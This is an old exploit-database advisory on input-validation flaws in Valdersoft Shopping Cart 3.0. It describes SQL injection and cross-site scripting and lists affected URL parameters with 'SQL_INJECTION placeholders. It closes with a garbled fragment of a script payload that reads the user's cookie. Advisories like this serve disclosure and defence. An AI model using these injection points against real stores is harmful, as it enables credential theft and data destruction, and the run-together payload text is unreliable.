Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities

ID EDB-ID:25301
Type exploitdb
Reporter Diabolic Crab
Modified 2005-03-28T00:00:00


Valdersoft Shopping Cart 3.0 Multiple Input Validation Vulnerabilities. Webapps exploit for php platform


Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.

An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.'SQL_INJECTION d=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION'SQL_INJECTION search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD ent.cookie)%3C/script%3E